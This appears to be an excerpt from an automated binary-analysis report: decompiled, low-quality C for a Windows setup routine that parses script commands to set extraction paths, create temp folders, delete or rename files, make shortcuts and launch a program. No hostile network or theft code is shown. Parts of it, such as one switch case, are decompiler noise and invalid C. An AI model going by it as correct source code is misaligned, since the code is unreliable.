                                                                            C-Code - Quality: 49%
                                                                            			E001AB4C7(void* __edx) {
                                                                            				intOrPtr _t215;
                                                                            				void* _t220;
                                                                            				intOrPtr _t278;
                                                                            				void* _t291;
                                                                            				WCHAR* _t293;
                                                                            				void* _t296;
                                                                            				WCHAR* _t297;
                                                                            				void* _t302;
                                                                            
                                                                            				_t291 = __edx;
                                                                            				E001AD870(E001C150B, _t302);
                                                                            				_t215 = 0x1bc80;
                                                                            				E001AD940();
                                                                            				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
                                                                            					L169:
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
                                                                            					return _t215;
                                                                            				}
                                                                            				_push(0x1000);
                                                                            				_push(_t302 - 0xe);
                                                                            				_push(_t302 - 0xd);
                                                                            				_push(_t302 - 0x5c84);
                                                                            				_push(_t302 - 0xfc8c);
                                                                            				_push( *((intOrPtr*)(_t302 + 0xc)));
                                                                            				_t215 = E001AA156();
                                                                            				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
                                                                            				if(0x1bc80 != 0) {
                                                                            					_t278 =  *((intOrPtr*)(_t302 + 0x10));
                                                                            					do {
                                                                            						_t220 = _t302 - 0x5c84;
                                                                            						_t296 = _t302 - 0x1bc8c;
                                                                            						_t293 = 6;
                                                                            						goto L4;
                                                                            						L6:
                                                                            						while(E001A1410(_t302 - 0xfc8c,  *((intOrPtr*)(0x1cd618 + _t297 * 4))) != 0) {
                                                                            							_t297 =  &(_t297[0]);
                                                                            							if(_t297 < 0xe) {
                                                                            								continue;
                                                                            							} else {
                                                                            								goto L167;
                                                                            							}
                                                                            						}
                                                                            						if(_t297 > 0xd) {
                                                                            							goto L167;
                                                                            						}
                                                                            						switch( *((intOrPtr*)(_t297 * 4 +  &M001AC0D7))) {
                                                                            							case 0:
                                                                            								__eflags = _t278 - 2;
                                                                            								if(_t278 != 2) {
                                                                            									goto L167;
                                                                            								}
                                                                            								_t299 = 0x800;
                                                                            								E001A95F8(_t302 - 0x7c84, 0x800);
                                                                            								E0019A188(E0019B625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
                                                                            								 *(_t302 - 4) = _t293;
                                                                            								E0019A2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
                                                                            								E00196EF9(_t302 - 0x3c84);
                                                                            								_push(_t293);
                                                                            								_t286 = _t302 - 0x8c8c;
                                                                            								_t238 = E0019A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
                                                                            								__eflags = _t238;
                                                                            								if(_t238 == 0) {
                                                                            									L28:
                                                                            									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
                                                                            									E0019A19E(_t302 - 0x8c8c);
                                                                            									goto L167;
                                                                            								} else {
                                                                            									goto L15;
                                                                            									L16:
                                                                            									E0019B1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
                                                                            									E0019AEA5(__eflags, _t302 - 0x103c, _t299);
                                                                            									_t301 = E001B2B33(_t302 - 0x7c84);
                                                                            									__eflags = _t301 - 4;
                                                                            									if(_t301 < 4) {
                                                                            										L18:
                                                                            										_t266 = E0019B5E5(_t302 - 0x5c84);
                                                                            										__eflags = _t266;
                                                                            										if(_t266 != 0) {
                                                                            											goto L28;
                                                                            										}
                                                                            										L19:
                                                                            										_t268 = E001B2B33(_t302 - 0x3c84);
                                                                            										__eflags = 0;
                                                                            										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
                                                                            										E001AE920(_t293, _t302 - 0x3c, _t293, 0x1e);
                                                                            										_t304 = _t304 + 0x10;
                                                                            										 *((intOrPtr*)(_t302 - 0x38)) = 3;
                                                                            										_push(0x14);
                                                                            										_pop(_t271);
                                                                            										 *((short*)(_t302 - 0x2c)) = _t271;
                                                                            										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
                                                                            										_push(_t302 - 0x3c);
                                                                            										 *0x1cdef4();
                                                                            										goto L20;
                                                                            									}
                                                                            									_t276 = E001B2B33(_t302 - 0x103c);
                                                                            									__eflags = _t301 - _t276;
                                                                            									if(_t301 > _t276) {
                                                                            										goto L19;
                                                                            									}
                                                                            									goto L18;
                                                                            									L20:
                                                                            									_t243 = GetFileAttributesW(_t302 - 0x3c84);
                                                                            									__eflags = _t243 - 0xffffffff;
                                                                            									if(_t243 == 0xffffffff) {
                                                                            										L27:
                                                                            										_push(_t293);
                                                                            										_t286 = _t302 - 0x8c8c;
                                                                            										_t245 = E0019A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
                                                                            										__eflags = _t245;
                                                                            										if(_t245 != 0) {
                                                                            											_t299 = 0x800;
                                                                            											L15:
                                                                            											SetFileAttributesW(_t302 - 0x3c84, _t293);
                                                                            											__eflags =  *((char*)(_t302 - 0x2c78));
                                                                            											if(__eflags == 0) {
                                                                            												goto L20;
                                                                            											}
                                                                            											goto L16;
                                                                            										}
                                                                            										goto L28;
                                                                            									}
                                                                            									_t247 = DeleteFileW(_t302 - 0x3c84);
                                                                            									__eflags = _t247;
                                                                            									if(_t247 != 0) {
                                                                            										goto L27;
                                                                            									} else {
                                                                            										_t300 = _t293;
                                                                            										_push(_t293);
                                                                            										goto L24;
                                                                            										L24:
                                                                            										E00193E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
                                                                            										_t304 = _t304 + 0x14;
                                                                            										_t252 = GetFileAttributesW(_t302 - 0x103c);
                                                                            										__eflags = _t252 - 0xffffffff;
                                                                            										if(_t252 != 0xffffffff) {
                                                                            											_t300 = _t300 + 1;
                                                                            											__eflags = _t300;
                                                                            											_push(_t300);
                                                                            											goto L24;
                                                                            										} else {
                                                                            											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
                                                                            											__eflags = _t255;
                                                                            											if(_t255 != 0) {
                                                                            												MoveFileExW(_t302 - 0x103c, _t293, 4);
                                                                            											}
                                                                            											goto L27;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							case 1:
                                                                            								__eflags = __ebx;
                                                                            								if(__ebx == 0) {
                                                                            									__eax = E001B2B33(__esi);
                                                                            									__eax = __eax + __edi;
                                                                            									_push(__eax);
                                                                            									_push( *0x1ece0c);
                                                                            									__eax = E001B2B5E(__ecx, __edx);
                                                                            									__esp = __esp + 0xc;
                                                                            									__eflags = __eax;
                                                                            									if(__eax != 0) {
                                                                            										 *0x1ece0c = __eax;
                                                                            										__eflags = __bl;
                                                                            										if(__bl != 0) {
                                                                            											__ecx = 0;
                                                                            											__eflags = 0;
                                                                            											 *__eax = __cx;
                                                                            										}
                                                                            										__eax = E001B66ED(__eax, __esi);
                                                                            										_pop(__ecx);
                                                                            										_pop(__ecx);
                                                                            									}
                                                                            									__eflags = __bh;
                                                                            									if(__bh == 0) {
                                                                            										__eax = L001B2B4E(__esi);
                                                                            									}
                                                                            								}
                                                                            								goto L167;
                                                                            							case 2:
                                                                            								__eflags = __ebx;
                                                                            								if(__ebx == 0) {
                                                                            									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
                                                                            								}
                                                                            								goto L167;
                                                                            							case 3:
                                                                            								__eflags = __ebx;
                                                                            								if(__ebx != 0) {
                                                                            									goto L167;
                                                                            								}
                                                                            								__eflags =  *0x1d9602 - __di;
                                                                            								if( *0x1d9602 != __di) {
                                                                            									goto L167;
                                                                            								}
                                                                            								__eax = 0;
                                                                            								__edi = __ebp - 0x5c84;
                                                                            								_push(0x22);
                                                                            								 *(__ebp - 0x103c) = __ax;
                                                                            								_pop(__eax);
                                                                            								__eflags =  *(__ebp - 0x5c84) - __ax;
                                                                            								if( *(__ebp - 0x5c84) == __ax) {
                                                                            									__edi = __ebp - 0x5c82;
                                                                            								}
                                                                            								__eax = E001B2B33(__edi);
                                                                            								__esi = 0x800;
                                                                            								__eflags = __eax - 0x800;
                                                                            								if(__eax >= 0x800) {
                                                                            									goto L167;
                                                                            								} else {
                                                                            									__eax =  *__edi & 0x0000ffff;
                                                                            									_push(0x5c);
                                                                            									_pop(__ecx);
                                                                            									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                                                                            									if(( *__edi & 0x0000ffff) != 0x2e) {
                                                                            										L54:
                                                                            										__eflags = __ax - __cx;
                                                                            										if(__ax == __cx) {
                                                                            											L66:
                                                                            											__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, __esi);
                                                                            											__ebx = 0;
                                                                            											__eflags = 0;
                                                                            											L67:
                                                                            											_push(0x22);
                                                                            											_pop(__eax);
                                                                            											__eax = __ebp - 0x103c;
                                                                            											__eax = E001B0D9B(__ebp - 0x103c, __ebp - 0x103c);
                                                                            											_pop(__ecx);
                                                                            											_pop(__ecx);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
                                                                            												if( *((intOrPtr*)(__eax + 2)) == __bx) {
                                                                            													__ecx = 0;
                                                                            													__eflags = 0;
                                                                            													 *__eax = __cx;
                                                                            												}
                                                                            											}
                                                                            											__eax = __ebp - 0x103c;
                                                                            											__edi = 0x1d9602;
                                                                            											E0019FAB1(0x1d9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
                                                                            											__eax = E001A9FFC(__ebp - 0x103c, __esi);
                                                                            											__esi = GetDlgItem( *(__ebp + 8), 0x66);
                                                                            											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
                                                                            											__ebx =  *0x1cdf7c;
                                                                            											__eax = SendMessageW(__esi, 0x143, __ebx, 0x1d9602); // executed
                                                                            											__eax = __ebp - 0x103c;
                                                                            											__eax = E001B2B69(__ebp - 0x103c, 0x1d9602, __eax);
                                                                            											_pop(__ecx);
                                                                            											_pop(__ecx);
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												__ebp - 0x103c = 0;
                                                                            												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
                                                                            											}
                                                                            											goto L167;
                                                                            										}
                                                                            										__eflags = __ax;
                                                                            										if(__ax == 0) {
                                                                            											L57:
                                                                            											__eax = __ebp - 0x18;
                                                                            											__ebx = 0;
                                                                            											_push(__ebp - 0x18);
                                                                            											_push(1);
                                                                            											_push(0);
                                                                            											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                                                                            											_push(0x80000002);
                                                                            											__eax =  *0x1cdea8();
                                                                            											__eflags = __eax;
                                                                            											if(__eax == 0) {
                                                                            												__eax = __ebp - 0x14;
                                                                            												 *(__ebp - 0x14) = 0x1000;
                                                                            												_push(__ebp - 0x14);
                                                                            												__eax = __ebp - 0x103c;
                                                                            												_push(__ebp - 0x103c);
                                                                            												__eax = __ebp - 0x1c;
                                                                            												_push(__ebp - 0x1c);
                                                                            												_push(0);
                                                                            												_push(L"ProgramFilesDir");
                                                                            												_push( *(__ebp - 0x18));
                                                                            												__eax =  *0x1cdea4();
                                                                            												_push( *(__ebp - 0x18));
                                                                            												 *0x1cde84() =  *(__ebp - 0x14);
                                                                            												__ecx = 0x7ff;
                                                                            												__eax =  *(__ebp - 0x14) >> 1;
                                                                            												__eflags = __eax - 0x7ff;
                                                                            												if(__eax >= 0x7ff) {
                                                                            													__eax = 0x7ff;
                                                                            												}
                                                                            												__ecx = 0;
                                                                            												__eflags = 0;
                                                                            												 *(__ebp + __eax * 2 - 0x103c) = __cx;
                                                                            											}
                                                                            											__eflags =  *(__ebp - 0x103c) - __bx;
                                                                            											if( *(__ebp - 0x103c) != __bx) {
                                                                            												__eax = __ebp - 0x103c;
                                                                            												__eax = E001B2B33(__ebp - 0x103c);
                                                                            												_push(0x5c);
                                                                            												_pop(__ecx);
                                                                            												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
                                                                            												if(__eflags != 0) {
                                                                            													__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, "\\", __esi);
                                                                            												}
                                                                            											}
                                                                            											__esi = E001B2B33(__edi);
                                                                            											__eax = __ebp - 0x103c;
                                                                            											__eflags = __esi - 0x7ff;
                                                                            											__esi = 0x800;
                                                                            											if(__eflags < 0) {
                                                                            												__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
                                                                            											}
                                                                            											goto L67;
                                                                            										}
                                                                            										__eflags =  *((short*)(__edi + 2)) - 0x3a;
                                                                            										if( *((short*)(__edi + 2)) == 0x3a) {
                                                                            											goto L66;
                                                                            										}
                                                                            										goto L57;
                                                                            									}
                                                                            									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                                                                            									if( *((intOrPtr*)(__edi + 2)) != __cx) {
                                                                            										goto L54;
                                                                            									}
                                                                            									__edi = __edi + 4;
                                                                            									__ebx = 0;
                                                                            									__eflags =  *__edi - __bx;
                                                                            									if( *__edi == __bx) {
                                                                            										goto L167;
                                                                            									} else {
                                                                            										__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, 0x800);
                                                                            										goto L67;
                                                                            									}
                                                                            								}
                                                                            							case 4:
                                                                            								__eflags =  *0x1d95fc - 1;
                                                                            								__eflags = __eax - 0x1d95fc;
                                                                            								 *__edi =  *__edi + __ecx;
                                                                            								__eflags =  *(__ebx + 6) & __bl;
                                                                            								 *__eax =  *__eax + __al;
                                                                            								__eflags =  *__eax;
                                                                            							case 5:
                                                                            								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                                                                            								__ecx = 0;
                                                                            								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                                                                            								__eflags = __eax;
                                                                            								if(__eax == 0) {
                                                                            									L84:
                                                                            									 *0x1d75d2 = __cl;
                                                                            									 *0x1d75d3 = 1;
                                                                            									goto L167;
                                                                            								}
                                                                            								__eax = __eax - 0x30;
                                                                            								__eflags = __eax;
                                                                            								if(__eax == 0) {
                                                                            									 *0x1d75d2 = __cl;
                                                                            									L83:
                                                                            									 *0x1d75d3 = __cl;
                                                                            									goto L167;
                                                                            								}
                                                                            								__eax = __eax - 1;
                                                                            								__eflags = __eax;
                                                                            								if(__eax == 0) {
                                                                            									goto L84;
                                                                            								}
                                                                            								__eax = __eax - 1;
                                                                            								__eflags = __eax;
                                                                            								if(__eax != 0) {
                                                                            									goto L167;
                                                                            								}
                                                                            								 *0x1d75d2 = 1;
                                                                            								goto L83;
                                                                            							case 6:
                                                                            								__eflags = __ebx - 4;
                                                                            								if(__ebx != 4) {
                                                                            									goto L94;
                                                                            								}
                                                                            								__eax = __ebp - 0x5c84;
                                                                            								__eax = E001B2B69(__ebp - 0x5c84, __eax, L"<>");
                                                                            								_pop(__ecx);
                                                                            								_pop(__ecx);
                                                                            								__eflags = __eax;
                                                                            								if(__eax == 0) {
                                                                            									goto L94;
                                                                            								}
                                                                            								_push(__edi);
                                                                            								goto L93;
                                                                            							case 7:
                                                                            								__eflags = __ebx - 1;
                                                                            								if(__eflags != 0) {
                                                                            									L115:
                                                                            									__eflags = __ebx - 7;
                                                                            									if(__ebx == 7) {
                                                                            										__eflags =  *0x1d95fc;
                                                                            										if( *0x1d95fc == 0) {
                                                                            											 *0x1d95fc = 2;
                                                                            										}
                                                                            										 *0x1d85f8 = 1;
                                                                            									}
                                                                            									goto L167;
                                                                            								}
                                                                            								__eax = __ebp - 0x7c84;
                                                                            								__edi = 0x800;
                                                                            								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
                                                                            								E0019AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
                                                                            								__esi = 0;
                                                                            								_push(0);
                                                                            								while(1) {
                                                                            									_push( *0x1cd5f8);
                                                                            									__ebp - 0x7c84 = E00193E41(0x1d85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
                                                                            									__eax = E00199E6B(0x1d85fa);
                                                                            									__eflags = __al;
                                                                            									if(__al == 0) {
                                                                            										break;
                                                                            									}
                                                                            									__esi =  &(__esi->i);
                                                                            									__eflags = __esi;
                                                                            									_push(__esi);
                                                                            								}
                                                                            								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x1d85fa);
                                                                            								__eflags =  *(__ebp - 0x5c84);
                                                                            								if( *(__ebp - 0x5c84) == 0) {
                                                                            									goto L167;
                                                                            								}
                                                                            								__eflags =  *0x1e5d02;
                                                                            								if( *0x1e5d02 != 0) {
                                                                            									goto L167;
                                                                            								}
                                                                            								__eax = 0;
                                                                            								 *(__ebp - 0x143c) = __ax;
                                                                            								__eax = __ebp - 0x5c84;
                                                                            								_push(0x2c);
                                                                            								_push(__ebp - 0x5c84);
                                                                            								__eax = E001B0BB8(__ecx);
                                                                            								_pop(__ecx);
                                                                            								_pop(__ecx);
                                                                            								__eflags = __eax;
                                                                            								if(__eax != 0) {
                                                                            									L111:
                                                                            									__eflags =  *(__ebp - 0x143c);
                                                                            									if( *(__ebp - 0x143c) == 0) {
                                                                            										__ebp - 0x1bc8c = __ebp - 0x5c84;
                                                                            										E0019FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
                                                                            										__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
                                                                            									}
                                                                            									__ebp - 0x5c84 = E001A9C4F(__ebp - 0x5c84);
                                                                            									__eax = 0;
                                                                            									 *(__ebp - 0x4c84) = __ax;
                                                                            									__ebp - 0x143c = __ebp - 0x5c84;
                                                                            									__eax = E001A9735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
                                                                            									__eflags = __eax - 6;
                                                                            									if(__eax == 6) {
                                                                            										goto L167;
                                                                            									} else {
                                                                            										__eax = 0;
                                                                            										__eflags = 0;
                                                                            										 *0x1d75d7 = 1;
                                                                            										 *0x1d85fa = __ax;
                                                                            										__eax = EndDialog( *(__ebp + 8), 1);
                                                                            										goto L115;
                                                                            									}
                                                                            								}
                                                                            								__edx = 0;
                                                                            								__esi = 0;
                                                                            								__eflags =  *(__ebp - 0x5c84) - __dx;
                                                                            								if( *(__ebp - 0x5c84) == __dx) {
                                                                            									goto L111;
                                                                            								}
                                                                            								__ecx = 0;
                                                                            								__eax = __ebp - 0x5c84;
                                                                            								while(1) {
                                                                            									__eflags =  *__eax - 0x40;
                                                                            									if( *__eax == 0x40) {
                                                                            										break;
                                                                            									}
                                                                            									__esi =  &(__esi->i);
                                                                            									__eax = __ebp - 0x5c84;
                                                                            									__ecx = __esi + __esi;
                                                                            									__eax = __ebp - 0x5c84 + __ecx;
                                                                            									__eflags =  *__eax - __dx;
                                                                            									if( *__eax != __dx) {
                                                                            										continue;
                                                                            									}
                                                                            									goto L111;
                                                                            								}
                                                                            								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
                                                                            								__ebp - 0x143c = E0019FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
                                                                            								__eax = 0;
                                                                            								__eflags = 0;
                                                                            								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
                                                                            								goto L111;
                                                                            							case 8:
                                                                            								__eflags = __ebx - 3;
                                                                            								if(__ebx == 3) {
                                                                            									__eflags =  *(__ebp - 0x5c84) - __di;
                                                                            									if(__eflags != 0) {
                                                                            										__eax = __ebp - 0x5c84;
                                                                            										_push(__ebp - 0x5c84);
                                                                            										__eax = E001B668C(__ebx, __edi);
                                                                            										_pop(__ecx);
                                                                            										 *0x1ede1c = __eax;
                                                                            									}
                                                                            									__eax = __ebp + 0xc;
                                                                            									_push(__ebp + 0xc);
                                                                            									 *0x1ede18 = E001AA2AE(__ecx, __edx, __eflags);
                                                                            								}
                                                                            								 *0x1e5d03 = 1;
                                                                            								goto L167;
                                                                            							case 9:
                                                                            								__eflags = __ebx - 5;
                                                                            								if(__ebx != 5) {
                                                                            									L94:
                                                                            									 *0x1ede20 = 1;
                                                                            									goto L167;
                                                                            								}
                                                                            								_push(1);
                                                                            								L93:
                                                                            								__eax = __ebp - 0x5c84;
                                                                            								_push(__ebp - 0x5c84);
                                                                            								_push( *(__ebp + 8));
                                                                            								__eax = E001AC431();
                                                                            								goto L94;
                                                                            							case 0xa:
                                                                            								__eflags = __ebx - 6;
                                                                            								if(__ebx != 6) {
                                                                            									goto L167;
                                                                            								}
                                                                            								__eax = 0;
                                                                            								 *(__ebp - 0x2c3c) = __ax;
                                                                            								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
                                                                            								__eax = E001B59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
                                                                            								_push(0x800);
                                                                            								__eflags = __eax - 0x50;
                                                                            								if(__eax == 0x50) {
                                                                            									_push(0x1ead0a);
                                                                            									__eax = __ebp - 0x2c3c;
                                                                            									_push(__ebp - 0x2c3c);
                                                                            									__eax = E0019FAB1();
                                                                            									 *(__ebp - 0x14) = 2;
                                                                            								} else {
                                                                            									__eflags = __eax - 0x54;
                                                                            									__eax = __ebp - 0x2c3c;
                                                                            									if(__eflags == 0) {
                                                                            										_push(0x1e9d0a);
                                                                            										_push(__eax);
                                                                            										__eax = E0019FAB1();
                                                                            										 *(__ebp - 0x14) = 7;
                                                                            									} else {
                                                                            										_push(0x1ebd0a);
                                                                            										_push(__eax);
                                                                            										__eax = E0019FAB1();
                                                                            										 *(__ebp - 0x14) = 0x10;
                                                                            									}
                                                                            								}
                                                                            								__eax = 0;
                                                                            								 *(__ebp - 0x9c8c) = __ax;
                                                                            								 *(__ebp - 0x1c3c) = __ax;
                                                                            								__ebp - 0x19c8c = __ebp - 0x6c84;
                                                                            								__eax = E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
                                                                            								_pop(__ecx);
                                                                            								_pop(__ecx);
                                                                            								_push(0x22);
                                                                            								_pop(__ebx);
                                                                            								__eflags =  *(__ebp - 0x6c84) - __bx;
                                                                            								if( *(__ebp - 0x6c84) != __bx) {
                                                                            									__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
                                                                            									__eflags = __al;
                                                                            									if(__al != 0) {
                                                                            										goto L152;
                                                                            									}
                                                                            									__ebx = __edi;
                                                                            									__esi = __ebp - 0x6c84;
                                                                            									__eflags =  *(__ebp - 0x6c84) - __bx;
                                                                            									if( *(__ebp - 0x6c84) == __bx) {
                                                                            										goto L152;
                                                                            									}
                                                                            									_push(0x20);
                                                                            									_pop(__ecx);
                                                                            									do {
                                                                            										__eax = __esi->i & 0x0000ffff;
                                                                            										__eflags = __ax - __cx;
                                                                            										if(__ax == __cx) {
                                                                            											L140:
                                                                            											__edi = __eax;
                                                                            											__eax = 0;
                                                                            											__esi->i = __ax;
                                                                            											__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
                                                                            											__eflags = __al;
                                                                            											if(__al == 0) {
                                                                            												__esi->i = __di;
                                                                            												L148:
                                                                            												_push(0x20);
                                                                            												_pop(__ecx);
                                                                            												__edi = 0;
                                                                            												__eflags = 0;
                                                                            												goto L149;
                                                                            											}
                                                                            											_push(0x2f);
                                                                            											_pop(__eax);
                                                                            											__ebx = __esi;
                                                                            											__eflags = __di - __ax;
                                                                            											if(__di != __ax) {
                                                                            												_push(0x20);
                                                                            												_pop(__eax);
                                                                            												do {
                                                                            													__esi =  &(__esi->i);
                                                                            													__eflags = __esi->i - __ax;
                                                                            												} while (__esi->i == __ax);
                                                                            												_push(__esi);
                                                                            												__eax = __ebp - 0x1c3c;
                                                                            												L146:
                                                                            												_push(__eax);
                                                                            												__eax = E001B4D7E();
                                                                            												_pop(__ecx);
                                                                            												_pop(__ecx);
                                                                            												 *__ebx = __di;
                                                                            												goto L148;
                                                                            											}
                                                                            											 *(__ebp - 0x1c3c) = __ax;
                                                                            											__eax =  &(__esi->i);
                                                                            											_push( &(__esi->i));
                                                                            											__eax = __ebp - 0x1c3a;
                                                                            											goto L146;
                                                                            										}
                                                                            										_push(0x2f);
                                                                            										_pop(__edx);
                                                                            										__eflags = __ax - __dx;
                                                                            										if(__ax != __dx) {
                                                                            											goto L149;
                                                                            										}
                                                                            										goto L140;
                                                                            										L149:
                                                                            										__esi =  &(__esi->i);
                                                                            										__eflags = __esi->i - __di;
                                                                            									} while (__esi->i != __di);
                                                                            									__eflags = __ebx;
                                                                            									if(__ebx != 0) {
                                                                            										__eax = 0;
                                                                            										__eflags = 0;
                                                                            										 *__ebx = __ax;
                                                                            									}
                                                                            									goto L152;
                                                                            								} else {
                                                                            									__ebp - 0x19c8a = __ebp - 0x6c84;
                                                                            									E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
                                                                            									_push(__ebx);
                                                                            									_push(__ebp - 0x6c82);
                                                                            									__eax = E001B0BB8(__ecx);
                                                                            									__esp = __esp + 0x10;
                                                                            									__eflags = __eax;
                                                                            									if(__eax != 0) {
                                                                            										__ecx = 0;
                                                                            										 *__eax = __cx;
                                                                            										__ebp - 0x1c3c = E001B4D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
                                                                            										_pop(__ecx);
                                                                            										_pop(__ecx);
                                                                            									}
                                                                            									L152:
                                                                            									__eflags =  *(__ebp - 0x11c8c);
                                                                            									__ebx = 0x800;
                                                                            									if( *(__ebp - 0x11c8c) != 0) {
                                                                            										_push(0x800);
                                                                            										__eax = __ebp - 0x9c8c;
                                                                            										_push(__ebp - 0x9c8c);
                                                                            										__eax = __ebp - 0x11c8c;
                                                                            										_push(__ebp - 0x11c8c);
                                                                            										__eax = E0019AED7();
                                                                            									}
                                                                            									_push(__ebx);
                                                                            									__eax = __ebp - 0xbc8c;
                                                                            									_push(__ebp - 0xbc8c);
                                                                            									__eax = __ebp - 0x6c84;
                                                                            									_push(__ebp - 0x6c84);
                                                                            									__eax = E0019AED7();
                                                                            									__eflags =  *(__ebp - 0x2c3c);
                                                                            									if(__eflags == 0) {
                                                                            										__ebp - 0x2c3c = E001AA24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
                                                                            									}
                                                                            									__ebp - 0x2c3c = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
                                                                            									__eflags =  *((short*)(__ebp - 0x17c8c));
                                                                            									if(__eflags != 0) {
                                                                            										__ebp - 0x17c8c = __ebp - 0x2c3c;
                                                                            										E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
                                                                            										__eax = E0019AEA5(__eflags, __ebp - 0x2c3c, __ebx);
                                                                            									}
                                                                            									__ebp - 0x2c3c = __ebp - 0xcc8c;
                                                                            									__eax = E001B4D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
                                                                            									__eflags =  *(__ebp - 0x13c8c);
                                                                            									__eax = __ebp - 0x13c8c;
                                                                            									_pop(__ecx);
                                                                            									_pop(__ecx);
                                                                            									if(__eflags == 0) {
                                                                            										__eax = __ebp - 0x19c8c;
                                                                            									}
                                                                            									__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
                                                                            									__eax = __ebp - 0x2c3c;
                                                                            									__eflags = E0019B153(__ebp - 0x2c3c);
                                                                            									if(__eflags == 0) {
                                                                            										L162:
                                                                            										__ebp - 0x2c3c = E0019FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
                                                                            										goto L163;
                                                                            									} else {
                                                                            										__eflags = __eax;
                                                                            										if(__eflags == 0) {
                                                                            											L163:
                                                                            											_push(1);
                                                                            											__eax = __ebp - 0x2c3c;
                                                                            											_push(__ebp - 0x2c3c);
                                                                            											E00199D3A(__ecx, __ebp) = __ebp - 0xbc8c;
                                                                            											__ebp - 0xac8c = E001B4D7E(__ebp - 0xac8c, __ebp - 0xbc8c);
                                                                            											_pop(__ecx);
                                                                            											_pop(__ecx);
                                                                            											__ebp - 0xac8c = E0019B98D(__eflags, __ebp - 0xac8c);
                                                                            											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
                                                                            											__eax = __ebp - 0x1c3c;
                                                                            											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
                                                                            											__edx = __ebp - 0x9c8c;
                                                                            											__esi = __ebp - 0xac8c;
                                                                            											asm("sbb ecx, ecx");
                                                                            											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
                                                                            											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
                                                                            											asm("sbb eax, eax");
                                                                            											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
                                                                            											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
                                                                            											__eax = __ebp - 0x15c8c;
                                                                            											asm("sbb edx, edx");
                                                                            											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
                                                                            											E001A9D41(__ebp - 0x15c8c) = __ebp - 0x2c3c;
                                                                            											__ebp - 0xbc8c = E001A9450(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
                                                                            											__eflags =  *(__ebp - 0xcc8c);
                                                                            											if( *(__ebp - 0xcc8c) != 0) {
                                                                            												_push(__edi);
                                                                            												__eax = __ebp - 0xcc8c;
                                                                            												_push(__ebp - 0xcc8c);
                                                                            												_push(5);
                                                                            												_push(0x1000);
                                                                            												__eax =  *0x1cdef8();
                                                                            											}
                                                                            											goto L167;
                                                                            										}
